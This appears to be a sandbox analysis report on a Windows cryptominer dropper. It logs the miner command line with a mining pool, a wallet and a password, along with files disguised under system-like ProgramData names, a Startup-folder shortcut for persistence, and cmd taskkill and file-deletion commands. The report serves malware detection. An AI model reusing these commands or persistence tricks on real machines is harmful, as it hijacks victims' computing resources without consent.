Source: C:\Users\user\Desktop\pj31M24DLn.exe	Process created: C:\Users\user\Desktop\pj31M24DLn.exe C:\Users\user\Desktop\pj31M24DLn.exe	Jump to behavior
Source: C:\Users\user\Desktop\pj31M24DLn.exe	Process created: C:\ProgramData\Data\Database.exe -epool eth.2miners.com:2020 -ewal 0x1bc6d72712986fDF33860e1e1B55C11000901350 -worker Worker -epsw password666 -mode 1 -Rmode 1 -log 0 -mport 0 -etha 0 -retrydelay 1 -coin eth	Jump to behavior
Source: C:\Users\user\Desktop\pj31M24DLn.exe	Process created: C:\ProgramData\Systemd\Datahub.exe NULL	Jump to behavior
Source: C:\Users\user\Desktop\pj31M24DLn.exe	Process created: C:\Windows\SysWOW64\cmd.exe 'C:\Windows\System32\cmd.exe' /K taskkill /IM Database.exe /F && exit	Jump to behavior
Source: C:\Users\user\Desktop\pj31M24DLn.exe	Process created: C:\Windows\SysWOW64\cmd.exe 'C:\Windows\System32\cmd.exe' /K taskkill /IM Datahub.exe /F && exit	Jump to behavior
Source: C:\Users\user\Desktop\pj31M24DLn.exe	Process created: C:\Windows\SysWOW64\cmd.exe 'C:\Windows\System32\cmd.exe' /K del /S /Q C:\ProgramData\Data\* && exit	Jump to behavior
Source: C:\Users\user\Desktop\pj31M24DLn.exe	Process created: C:\Windows\SysWOW64\cmd.exe 'C:\Windows\System32\cmd.exe' /K del /S /Q C:\ProgramData\Systemd\* && exit	Jump to behavior
Source: C:\Users\user\Desktop\pj31M24DLn.exe	Process created: C:\Windows\SysWOW64\cmd.exe 'C:\Windows\System32\cmd.exe' /K taskkill /IM Database.exe /F && exit	Jump to behavior
Source: C:\Users\user\Desktop\pj31M24DLn.exe	Process created: C:\Windows\SysWOW64\cmd.exe 'C:\Windows\System32\cmd.exe' /K del /S /Q C:\ProgramData\Data\* && exit	Jump to behavior
Source: C:\Users\user\Desktop\pj31M24DLn.exe	Process created: C:\Windows\SysWOW64\cmd.exe 'C:\Windows\System32\cmd.exe' /K taskkill /IM	Jump to behavior
Source: C:\Users\user\Desktop\pj31M24DLn.exe	Process created: C:\Windows\SysWOW64\cmd.exe 'C:\Windows\System32\cmd.exe' /K del /S /Q C:\ProgramData\Systemd\* && exit	Jump to behavior
Source: C:\Users\user\Desktop\pj31M24DLn.exe	Process created: C:\ProgramData\Data\Database.exe -epool eth.2miners.com:2020 -ewal 0x1bc6d72712986fDF33860e1e1B55C11000901350 -worker Worker -epsw password666 -mode 1 -Rmode 1 -log 0 -mport 0 -etha 0 -retrydelay 1 -coin eth	Jump to behavior
Source: C:\Users\user\Desktop\pj31M24DLn.exe	Process created: C:\Windows\SysWOW64\cmd.exe 'C:\Windows\System32\cmd.exe' /K taskkill /IM Database.exe /F && exit	Jump to behavior
Source: C:\Users\user\Desktop\pj31M24DLn.exe	Process created: C:\Windows\SysWOW64\cmd.exe 'C:\Windows\System32\cmd.exe' /K taskkill /IM Datahub.exe /F && exit	Jump to behavior
Source: C:\Users\user\Desktop\pj31M24DLn.exe	Process created: C:\Windows\SysWOW64\cmd.exe 'C:\Windows\System32\cmd.exe' /K del /S /Q C:\ProgramData\Data\* && exit	Jump to behavior
Source: C:\Users\user\Desktop\pj31M24DLn.exe	Process created: C:\Windows\SysWOW64\cmd.exe 'C:\Windows\System32\cmd.exe' /K del /S /Q C:\ProgramData\Systemd\* && exit	Jump to behavior
Source: C:\Users\user\Desktop\pj31M24DLn.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /IM Datahub.exe /F	Jump to behavior
Source: C:\Users\user\Desktop\pj31M24DLn.exe	Process created: C:\Windows\SysWOW64\cmd.exe 'C:\Windows\System32\cmd.exe' /K del /S /Q C:\ProgramData\Data\* && exit	Jump to behavior
Source: C:\Users\user\Desktop\pj31M24DLn.exe	Process created: C:\Windows\SysWOW64\cmd.exe 'C:\Windows\System32\cmd.exe' /K taskkill /IM	Jump to behavior
Source: C:\Users\user\Desktop\pj31M24DLn.exe	Process created: C:\Windows\SysWOW64\cmd.exe 'C:\Windows\System32\cmd.exe' /K del /S /Q C:\ProgramData\Systemd\* && exit	Jump to behavior
Source: C:\Users\user\Desktop\pj31M24DLn.exe	Process created: C:\ProgramData\Data\Database.exe -epool eth.2miners.com:2020 -ewal 0x1bc6d72712986fDF33860e1e1B55C11000901350 -worker Worker -epsw password666 -mode 1 -Rmode 1 -log 0 -mport 0 -etha 0 -retrydelay 1 -coin eth	Jump to behavior
Source: C:\Users\user\Desktop\pj31M24DLn.exe	Process created: C:\Windows\SysWOW64\cmd.exe 'C:\Windows\System32\cmd.exe' /K taskkill /IM Database.exe /F && exit	Jump to behavior
Source: C:\Users\user\Desktop\pj31M24DLn.exe	Process created: C:\Windows\SysWOW64\cmd.exe 'C:\Windows\System32\cmd.exe' /K taskkill /IM Datahub.exe /F && exit	Jump to behavior
Source: C:\Users\user\Desktop\pj31M24DLn.exe	Process created: C:\Windows\SysWOW64\cmd.exe 'C:\Windows\System32\cmd.exe' /K del /S /Q C:\ProgramData\Data\* && exit	Jump to behavior
Source: C:\Users\user\Desktop\pj31M24DLn.exe	Process created: C:\Windows\SysWOW64\cmd.exe 'C:\Windows\System32\cmd.exe' /K del /S /Q C:\ProgramData\Systemd\* && exit	Jump to behavior
Source: C:\Users\user\Desktop\pj31M24DLn.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\pj31M24DLn.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\pj31M24DLn.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\pj31M24DLn.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\pj31M24DLn.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\pj31M24DLn.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\pj31M24DLn.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\pj31M24DLn.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\pj31M24DLn.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1	Jump to behavior
Source: C:\Users\user\Desktop\pj31M24DLn.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\pj31M24DLn.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\pj31M24DLn.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\pj31M24DLn.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\pj31M24DLn.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\pj31M24DLn.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\pj31M24DLn.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\pj31M24DLn.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\pj31M24DLn.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\pj31M24DLn.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\pj31M24DLn.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\pj31M24DLn.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\pj31M24DLn.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1	Jump to behavior
Source: C:\Users\user\Desktop\pj31M24DLn.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\pj31M24DLn.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\pj31M24DLn.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\pj31M24DLn.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\pj31M24DLn.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\pj31M24DLn.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\pj31M24DLn.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\pj31M24DLn.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\pj31M24DLn.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\pj31M24DLn.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\pj31M24DLn.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\pj31M24DLn.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\pj31M24DLn.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\pj31M24DLn.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\pj31M24DLn.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\pj31M24DLn.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\pj31M24DLn.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\pj31M24DLn.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\pj31M24DLn.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\pj31M24DLn.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\pj31M24DLn.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\pj31M24DLn.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\pj31M24DLn.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\pj31M24DLn.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\pj31M24DLn.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\pj31M24DLn.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\pj31M24DLn.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\pj31M24DLn.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\pj31M24DLn.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\pj31M24DLn.exe	Process created: unknown unknown	Jump to behavior
Source: C:\ProgramData\Microsoft Network\System.exe	Process created: C:\ProgramData\Microsoft Network\System.exe C:\ProgramData\Microsoft Network\System.exe	Jump to behavior
Source: C:\ProgramData\Microsoft Network\System.exe	Process created: C:\ProgramData\Microsoft Network\System.exe C:\ProgramData\Microsoft Network\System.exe	Jump to behavior
Source: C:\ProgramData\Microsoft Network\System.exe	Process created: C:\ProgramData\Microsoft Network\System.exe C:\ProgramData\Microsoft Network\System.exe	Jump to behavior
Source: C:\ProgramData\Microsoft Network\System.exe	Process created: C:\ProgramData\Microsoft Network\System.exe C:\ProgramData\Microsoft Network\System.exe	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /IM Database.exe /F	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /IM Datahub.exe /F	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /IM Database.exe /F
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /IM
Source: C:\ProgramData\Microsoft Network\System.exe	Process created: C:\ProgramData\Systemd\Datahub.exe NULL
Source: C:\ProgramData\Microsoft Network\System.exe	Process created: C:\Windows\SysWOW64\cmd.exe 'C:\Windows\System32\cmd.exe' /K taskkill /IM Database.exe /F && exit
Source: C:\ProgramData\Microsoft Network\System.exe	Process created: C:\Windows\SysWOW64\cmd.exe 'C:\Windows\System32\cmd.exe' /K del /S /Q C:\ProgramData\Data\* && exit
Source: C:\ProgramData\Microsoft Network\System.exe	Process created: C:\Windows\SysWOW64\cmd.exe 'C:\Windows\System32\cmd.exe' /K taskkill /IM Datahub.exe /F && exit
Source: C:\ProgramData\Microsoft Network\System.exe	Process created: C:\Windows\SysWOW64\cmd.exe 'C:\Windows\System32\cmd.exe' /K del /S /Q C:\ProgramData\Systemd\* && exit
Source: C:\ProgramData\Microsoft Network\System.exe	Process created: C:\ProgramData\Systemd\Datahub.exe NULL
Source: C:\ProgramData\Microsoft Network\System.exe	Process created: C:\Windows\SysWOW64\cmd.exe 'C:\Windows\System32\cmd.exe' /K taskkill /IM Database.exe /F && exit
Source: C:\ProgramData\Microsoft Network\System.exe	Process created: C:\Windows\SysWOW64\cmd.exe 'C:\Windows\System32\cmd.exe' /K taskkill /IM Datahub.exe /F && exit
Source: C:\ProgramData\Microsoft Network\System.exe	Process created: C:\Windows\SysWOW64\cmd.exe 'C:\Windows\System32\cmd.exe' /K del /S /Q C:\ProgramData\Data\* && exit
Source: C:\ProgramData\Microsoft Network\System.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\ProgramData\Microsoft Network\System.exe	Process created: unknown unknown
Source: C:\ProgramData\Microsoft Network\System.exe	Process created: unknown unknown
Source: C:\ProgramData\Microsoft Network\System.exe	Process created: unknown unknown
Source: C:\ProgramData\Microsoft Network\System.exe	Process created: unknown unknown
Source: C:\ProgramData\Microsoft Network\System.exe	Process created: unknown unknown
Source: C:\ProgramData\Microsoft Network\System.exe	Process created: unknown unknown
Source: C:\ProgramData\Microsoft Network\System.exe	Process created: unknown unknown
Source: C:\ProgramData\Microsoft Network\System.exe	Process created: unknown unknown
Source: C:\ProgramData\Microsoft Network\System.exe	Process created: unknown unknown
Source: C:\ProgramData\Microsoft Network\System.exe	Process created: unknown unknown
Source: C:\ProgramData\Microsoft Network\System.exe	Process created: unknown unknown
Source: C:\ProgramData\Microsoft Network\System.exe	Process created: unknown unknown
Source: C:\ProgramData\Microsoft Network\System.exe	Process created: unknown unknown
Source: C:\ProgramData\Microsoft Network\System.exe	Process created: unknown unknown
Source: C:\ProgramData\Microsoft Network\System.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /IM Database.exe /F
Source: C:\ProgramData\Microsoft Network\System.exe	Process created: unknown unknown
Source: C:\ProgramData\Microsoft Network\System.exe	Process created: unknown unknown
Source: C:\ProgramData\Microsoft Network\System.exe	Process created: unknown unknown
Source: C:\ProgramData\Microsoft Network\System.exe	Process created: unknown unknown
Source: C:\ProgramData\Microsoft Network\System.exe	Process created: unknown unknown
Source: C:\ProgramData\Microsoft Network\System.exe	Process created: unknown unknown
Source: C:\ProgramData\Microsoft Network\System.exe	Process created: unknown unknown
Source: C:\ProgramData\Microsoft Network\System.exe	Process created: unknown unknown
Source: C:\ProgramData\Microsoft Network\System.exe	Process created: unknown unknown
Source: C:\ProgramData\Microsoft Network\System.exe	Process created: unknown unknown
Source: C:\ProgramData\Microsoft Network\System.exe	Process created: unknown unknown
Source: C:\ProgramData\Microsoft Network\System.exe	Process created: unknown unknown
Source: C:\ProgramData\Microsoft Network\System.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\ProgramData\Microsoft Network\System.exe	Process created: unknown unknown
Source: C:\ProgramData\Microsoft Network\System.exe	Process created: unknown unknown
Source: C:\ProgramData\Microsoft Network\System.exe	Process created: unknown unknown
Source: C:\ProgramData\Microsoft Network\System.exe	Process created: unknown unknown
Source: C:\ProgramData\Microsoft Network\System.exe	Process created: unknown unknown
Source: C:\ProgramData\Microsoft Network\System.exe	Process created: unknown unknown
Source: C:\ProgramData\Microsoft Network\System.exe	Process created: unknown unknown
Source: C:\ProgramData\Microsoft Network\System.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\ProgramData\Microsoft Network\System.exe	Process created: unknown unknown
Source: C:\ProgramData\Microsoft Network\System.exe	Process created: unknown unknown
Source: C:\ProgramData\Microsoft Network\System.exe	Process created: unknown unknown
Source: C:\ProgramData\Microsoft Network\System.exe	Process created: unknown unknown
Source: C:\ProgramData\Microsoft Network\System.exe	Process created: unknown unknown

Source: C:\Users\user\Desktop\pj31M24DLn.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32

Source: C:\Windows\SysWOW64\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "Database.exe")
Source: C:\Windows\SysWOW64\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "Datahub.exe")
Source: C:\Windows\SysWOW64\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "Database.exe")

Source: C:\Users\user\Desktop\pj31M24DLn.exe

5_2_00406230

Source: C:\Users\user\Desktop\pj31M24DLn.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll			Jump to behavior
Source: C:\ProgramData\Microsoft Network\System.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll			Jump to behavior

Source: C:\Users\user\Desktop\pj31M24DLn.exe

Code function: 5_2_00404DA0 CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,Process32NextW,OpenProcess,CloseHandle,

5_2_00404DA0

Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6196:120:WilError_01
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6592:120:WilError_01
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5416:120:WilError_01
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6268:120:WilError_01
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6288:120:WilError_01
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6600:120:WilError_01
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1188:120:WilError_01
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6516:120:WilError_01
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5632:120:WilError_01

Source: Datahub.exe	String found in binary or memory: --help
Source: Datahub.exe	String found in binary or memory: --help
Source: Datahub.exe	String found in binary or memory: -h, --help display this help and exit
Source: Datahub.exe	String found in binary or memory: -h, --help display this help and exit

Source: C:\Users\user\Desktop\pj31M24DLn.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\Desktop\pj31M24DLn.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\Desktop\pj31M24DLn.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\Desktop\pj31M24DLn.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\ProgramData\Microsoft Network\System.exe	File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\ProgramData\Microsoft Network\System.exe	File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\ProgramData\Microsoft Network\System.exe	File read: C:\Windows\System32\drivers\etc\hosts

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Users\user\Desktop\pj31M24DLn.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Source: pj31M24DLn.exe

Static PE information: Virtual size of .text is bigger than: 0x100000

Source: pj31M24DLn.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR

Source: pj31M24DLn.exe

Static file information: File size 1261056 > 1048576

Source: pj31M24DLn.exe

Static PE information: Raw size of .text is bigger than: 0x100000 < 0x133400

Source: pj31M24DLn.exe

Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT

Source:	Binary string: c:\miniprojects\x86il\il86\x64\release\IL86.pdb! source: Database.exe, 00000008.00000002.296694327.00007FF67BCBD000.00000040.00020000.sdmp
Source:	Binary string: c:\miniprojects\x86il\il86\x64\release\IL86.pdb source: Database.exe, 00000008.00000002.296694327.00007FF67BCBD000.00000040.00020000.sdmp

Source: C:\Users\user\Desktop\pj31M24DLn.exe	Code function: 1_2_00AA02DF push eax; ret	1_2_00AA02E0
Source: C:\Users\user\Desktop\pj31M24DLn.exe	Code function: 1_2_06523291 push es; retf 5231h	1_2_065232C0
Source: C:\Users\user\Desktop\pj31M24DLn.exe	Code function: 1_2_065248EC push es; retn 5244h	1_2_0652490C
Source: C:\Users\user\Desktop\pj31M24DLn.exe	Code function: 1_2_08443EFB push ss; ret	1_2_08443EFD
Source: C:\Users\user\Desktop\pj31M24DLn.exe	Code function: 1_2_08443129 push esi; iretd	1_2_0844312D
Source: C:\Users\user\Desktop\pj31M24DLn.exe	Code function: 5_2_004560C5 push esi; ret	5_2_004560CE
Source: C:\Users\user\Desktop\pj31M24DLn.exe	Code function: 5_2_004000A9 pushad ; ret	5_2_004000B5
Source: C:\Users\user\Desktop\pj31M24DLn.exe	Code function: 5_2_00450B64 push cs; iretd	5_2_00450C3A
Source: C:\Users\user\Desktop\pj31M24DLn.exe	Code function: 5_2_00450C66 push cs; iretd	5_2_00450C3A
Source: C:\Users\user\Desktop\pj31M24DLn.exe	Code function: 5_2_00450E16 push ebx; ret	5_2_00450E17
Source: C:\Users\user\Desktop\pj31M24DLn.exe	Code function: 5_2_00423EFE push ecx; ret	5_2_00423F14
Source: C:\Users\user\Desktop\pj31M24DLn.exe	Code function: 5_2_00423F01 push ecx; ret	5_2_00423F14
Source: C:\Users\user\Desktop\pj31M24DLn.exe	Code function: 5_2_00A69C4E push ecx; ret	5_2_00A69C56
Source: C:\ProgramData\Microsoft Network\System.exe	Code function: 9_2_003E501E push ecx; retf	9_2_003E5023
Source: C:\ProgramData\Microsoft Network\System.exe	Code function: 9_2_003E2C78 push esp; ret	9_2_003E2C79
Source: C:\ProgramData\Microsoft Network\System.exe	Code function: 9_2_003E746A push esi; iretd	9_2_003E7470
Source: C:\ProgramData\Microsoft Network\System.exe	Code function: 9_2_003E22A1 push D1002C35h; ret	9_2_003E22A7
Source: C:\ProgramData\Microsoft Network\System.exe	Code function: 9_2_003E2699 push es; iretd	9_2_003E26A7
Source: C:\ProgramData\Microsoft Network\System.exe	Code function: 9_2_003E4886 push 8BE3BCF9h; iretd	9_2_003E489B
Source: C:\ProgramData\Microsoft Network\System.exe	Code function: 9_2_003E2903 push ebp; retf	9_2_003E2904
Source: C:\ProgramData\Microsoft Network\System.exe	Code function: 9_2_003E2D8C push ss; retf	9_2_003E2DB0
Source: C:\ProgramData\Microsoft Network\System.exe	Code function: 9_2_07D73EFB push ss; ret	9_2_07D73EFD
Source: C:\ProgramData\Microsoft Network\System.exe	Code function: 9_2_07D73129 push esi; iretd	9_2_07D7312D
Source: C:\ProgramData\Microsoft Network\System.exe	Code function: 31_2_0008501E push ecx; retf	31_2_00085023
Source: C:\ProgramData\Microsoft Network\System.exe	Code function: 31_2_0008746A push esi; iretd	31_2_00087470
Source: C:\ProgramData\Microsoft Network\System.exe	Code function: 31_2_00082C78 push esp; ret	31_2_00082C79
Source: C:\ProgramData\Microsoft Network\System.exe	Code function: 31_2_00084886 push 8BE3BCF9h; iretd	31_2_0008489B
Source: C:\ProgramData\Microsoft Network\System.exe	Code function: 31_2_00082699 push es; iretd	31_2_000826A7
Source: C:\ProgramData\Microsoft Network\System.exe	Code function: 31_2_000822A1 push D1002C35h; ret	31_2_000822A7
Source: C:\ProgramData\Microsoft Network\System.exe	Code function: 31_2_00082903 push ebp; retf	31_2_00082904
Source: C:\ProgramData\Microsoft Network\System.exe	Code function: 31_2_00082D8C push ss; retf	31_2_00082DB0

Source: Database.exe.5.dr	Static PE information: section name:
Source: Database.exe.5.dr	Static PE information: section name:
Source: Database.exe.5.dr	Static PE information: section name:
Source: Database.exe.5.dr	Static PE information: section name:
Source: Database.exe.5.dr	Static PE information: section name:
Source: Database.exe.5.dr	Static PE information: section name:
Source: Database.exe.5.dr	Static PE information: section name:
Source: Database.exe.5.dr	Static PE information: section name:
Source: Database.exe.5.dr	Static PE information: section name: .exports
Source: Database.exe.5.dr	Static PE information: section name: .imports
Source: Database.exe.5.dr	Static PE information: section name: .themida
Source: Database.exe.5.dr	Static PE information: section name: .boot
Source: Datahub.exe.5.dr	Static PE information: section name: .xdata

Source: initial sample

Static PE information: section where entry point is pointing to: .boot

Source: Database.exe.5.dr	Static PE information: real checksum: 0x8197bf should be:
Source: pj31M24DLn.exe	Static PE information: real checksum: 0x0 should be: 0x13df76
Source: Datahub.exe.5.dr	Static PE information: real checksum: 0x6e3326 should be:
Source: System.exe.5.dr	Static PE information: real checksum: 0x0 should be: 0x13df76

Source: initial sample	Static PE information: section name: .text entropy: 7.67654182175
Source: initial sample	Static PE information: section name: .text entropy: 7.67654182175

Source: C:\Users\user\Desktop\pj31M24DLn.exe	File created: C:\ProgramData\Microsoft Network\System.exe	Jump to dropped file
Source: C:\Users\user\Desktop\pj31M24DLn.exe	File created: C:\ProgramData\Systemd\old.exe (copy)
Source: C:\Users\user\Desktop\pj31M24DLn.exe	File created: C:\ProgramData\Data\old.exe (copy)
Source: C:\Users\user\Desktop\pj31M24DLn.exe	File created: C:\ProgramData\Data\Database.exe
Source: C:\Users\user\Desktop\pj31M24DLn.exe	File created: C:\ProgramData\Systemd\Datahub.exe

Source: C:\Users\user\Desktop\pj31M24DLn.exe	File created: C:\ProgramData\Microsoft Network\System.exe	Jump to dropped file
Source: C:\Users\user\Desktop\pj31M24DLn.exe	File created: C:\ProgramData\Systemd\old.exe (copy)
Source: C:\Users\user\Desktop\pj31M24DLn.exe	File created: C:\ProgramData\Data\old.exe (copy)
Source: C:\Users\user\Desktop\pj31M24DLn.exe	File created: C:\ProgramData\Data\Database.exe
Source: C:\Users\user\Desktop\pj31M24DLn.exe	File created: C:\ProgramData\Systemd\Datahub.exe

Source: C:\Users\user\Desktop\pj31M24DLn.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\exe.lnk

Source: C:\Users\user\Desktop\pj31M24DLn.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\exe.lnk

Source: C:\Users\user\Desktop\pj31M24DLn.exe

Registry key monitored for changes: HKEY_CURRENT_USER_Classes

Source: C:\Users\user\Desktop\pj31M24DLn.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\pj31M24DLn.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\pj31M24DLn.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\pj31M24DLn.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\pj31M24DLn.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\pj31M24DLn.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\pj31M24DLn.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\pj31M24DLn.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\pj31M24DLn.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\pj31M24DLn.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\pj31M24DLn.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\pj31M24DLn.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\pj31M24DLn.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\pj31M24DLn.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\pj31M24DLn.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\pj31M24DLn.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\pj31M24DLn.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\pj31M24DLn.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\pj31M24DLn.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\pj31M24DLn.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\pj31M24DLn.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\pj31M24DLn.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
